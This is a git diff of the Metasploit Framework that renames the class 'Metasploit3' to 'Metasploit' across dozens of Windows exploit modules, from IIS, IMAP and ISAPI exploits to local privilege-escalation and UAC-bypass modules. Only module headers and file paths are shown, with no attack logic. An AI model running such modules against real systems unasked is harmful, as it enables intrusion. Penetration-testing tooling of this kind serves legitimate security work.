a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index 4638454fcb..db62b4f93d 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 930a01332d..30541ee1ee 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sws_connection_bof.rb b/modules/exploits/windows/http/sws_connection_bof.rb index e8bfdbb437..2354ce2058 100644 --- a/modules/exploits/windows/http/sws_connection_bof.rb +++ b/modules/exploits/windows/http/sws_connection_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] } diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index e25b6b7075..65a831a9e1 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index d770ad3532..03e974083c 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index 627868613f..60d7bd2b9b 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackit_file_upload.rb b/modules/exploits/windows/http/trackit_file_upload.rb index 1d33984b1e..d1481a4915 100644 --- a/modules/exploits/windows/http/trackit_file_upload.rb +++ b/modules/exploits/windows/http/trackit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index c9482fdcf8..526ff90aa4 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ultraminihttp_bof.rb b/modules/exploits/windows/http/ultraminihttp_bof.rb index ac5841b53a..73add99e10 100644 --- a/modules/exploits/windows/http/ultraminihttp_bof.rb +++ b/modules/exploits/windows/http/ultraminihttp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 683baf2a5c..c03e81e89f 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb index 0a8a6421b9..b2c63a1712 100644 --- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb +++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*Win32/ ] } diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index 0cec534547..00278d65b9 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 744519e2fd..7f254a57b9 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index bcb6a05fc3..13ac377ed5 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb index f0623ef54a..aa8725e873 100644 --- a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 3a4eecf03c..8e331f176a 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 60c0e47956..2c705e5a41 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index b425fd66f9..1621eeb763 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index b4f2dd6579..48cc182e1b 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # NOTE: This cannot be an HttpClient module since the response from the server diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 284ef19b3a..6c5bf1b7d3 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index c58d7acfc6..6a02f1206b 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 3e201893f9..a0f11afea0 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 1b8c895093..71816727f0 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index de5f2e17b7..67e0f74c2b 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index c5f04e6144..791aeb0eb4 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index de067d9294..25c56616a5 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index f658c6baa2..8f02374c60 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index 25987fbebe..69958e9104 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index d67fcf75c2..08b1200716 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index e13027054f..af6205b20b 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 866fcb3116..1ec15c56a6 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 36ee2fac67..564cf91888 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index b24383dc90..d3628c5831 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index f243370a84..ed7eb30b8a 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 45327f91f3..4e35c2bb86 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index 4ef6097ca4..5c21b7c4cb 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index bae7c3804c..0b371add29 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index eb566db50b..813ac385f4 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index afe668e445..88114bf6e1 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index 340c2ab009..eb28f97dec 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index 650164ac9e..cdbcb1047e 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb index b9b5f4021a..6f327bd73c 100644 --- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb +++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb index bcd830845f..6c30f4ddf9 100644 --- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index fb6abff5d1..33008604b6 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index d870242fdc..17164a4549 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] } diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index 50a1a5f24d..0ac0316df8 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index a193758e93..ce717d20e5 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 4a7b594cd8..1acbdfafea 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 21dc18ab0e..17bcdc4bdf 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb index 28092a2253..9867959748 100644 --- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb +++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index 0395c7089c..a358ec467f 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb index a51426ae9c..1c6efc6aed 100644 --- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/agnitum_outpost_acs.rb b/modules/exploits/windows/local/agnitum_outpost_acs.rb index e8982c1720..fb8cf0914b 100644 --- a/modules/exploits/windows/local/agnitum_outpost_acs.rb +++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb index 444f67a6de..14ba6c8f4d 100644 --- a/modules/exploits/windows/local/always_install_elevated.rb +++ b/modules/exploits/windows/local/always_install_elevated.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 00c7b0b0bb..02b4fea747 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Priv diff --git a/modules/exploits/windows/local/bthpan.rb b/modules/exploits/windows/local/bthpan.rb index e0e5d015cd..85c8dc6b6f 100644 --- a/modules/exploits/windows/local/bthpan.rb +++ b/modules/exploits/windows/local/bthpan.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 8cfb23418c..ed41073584 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 9bc5fa4028..bca5bbab9b 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_vbs.rb b/modules/exploits/windows/local/bypassuac_vbs.rb index b560da405e..85f0c8f0c4 100644 --- a/modules/exploits/windows/local/bypassuac_vbs.rb +++ b/modules/exploits/windows/local/bypassuac_vbs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::FileDropper diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index 58729c5f29..3da6910ce2 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Services diff --git a/modules/exploits/windows/local/ikeext_service.rb b/modules/exploits/windows/local/ikeext_service.rb index 7278e5aee6..224e8d65ee 100644 --- a/modules/exploits/windows/local/ikeext_service.rb +++ b/modules/exploits/windows/local/ikeext_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ipass_launch_app.rb b/modules/exploits/windows/local/ipass_launch_app.rb index 1a49cb233d..a566d94870 100644 --- a/modules/exploits/windows/local/ipass_launch_app.rb +++ b/modules/exploits/windows/local/ipass_launch_app.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb index 35e5fe61b1..2e8391d2d3 100644 --- a/modules/exploits/windows/local/lenovo_systemupdate.rb +++ b/modules/exploits/windows/local/lenovo_systemupdate.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb index 024fb55adc..aafd455a27 100644 --- a/modules/exploits/windows/local/mqac_write.rb +++ b/modules/exploits/windows/local/mqac_write.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < 